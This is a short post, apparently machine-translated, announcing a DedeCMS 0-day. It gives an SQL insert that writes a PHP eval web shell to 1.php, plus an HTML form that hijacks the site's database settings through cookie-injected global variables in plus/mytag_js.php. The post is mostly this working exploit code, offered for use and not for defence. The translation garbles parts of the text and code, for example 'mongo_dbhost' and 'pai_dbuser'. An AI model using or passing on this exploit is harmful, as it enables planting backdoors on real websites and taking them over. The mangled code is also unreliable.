Dedecms new 0day: WEBSHELL can be used directly without entering the background

By: jannock
All the data transmitted over the Internet means that the backend can be used only when the plus directory exists, and the server can be connected externally, the shell can be used.

Prerequisites: You must prepare your own dede database and then insert the data:

The following is a reference clip:

Insert into dede_mytag (aid, normbody) values (1, '{dede: php} $ fp = @ fopen ("1.php", \ 'a \'); @ fwrite ($ fp, \ '<? Php eval ($ _ POST [c])?> \ '); Echo "OK"; @ fclose ($ fp); {/dede: php }');
 

 

Submit the statement using the following form, and shell will be 1.php in the same directory. The principle of self-study...

The following is a reference clip:

<Form action = "" method = "post" name = "QuickSearch" id = "QuickSearch" onsubmit = "addaction ();">
<Input type = "text" value = "http://www.bkjia.com/plus/mytag_js.php? Aid = 1 "name =" doaction "style =" width: 400 "> <br/>
<Input type = "text" value = "dbhost" name = "_ COOKIE [GLOBALS] [mongo_dbhost]" style = "width: 400"> <br/>
<Input type = "text" value = "dbuser" name = "_ COOKIE [GLOBALS] [pai_dbuser]" style = "width: 400"> <br/>
<Input type = "text" value = "dbpwd" name = "_ COOKIE [GLOBALS] [mongo_dbpwd]" style = "width: 400"> <br/>
<Input type = "text" value = "dbname" name = "_ COOKIE [GLOBALS] [mongo_dbname]" style = "width: 400"> <br/>
<Input type = "text" value = "dede _" name = "_ COOKIE [GLOBALS] [pai_dbprefix]" style = "width: 400"> <br/>
<Input type = "text" value = "true" name = "nocache" style = "width: 400">
<Input type = "submit" value = "submit" name = "QuickSearchBtn"> <br/>
</Form>
<Script>
Function addaction ()
{
Document. QuickSearch. action = document. QuickSearch. doaction. value;
}
</Script>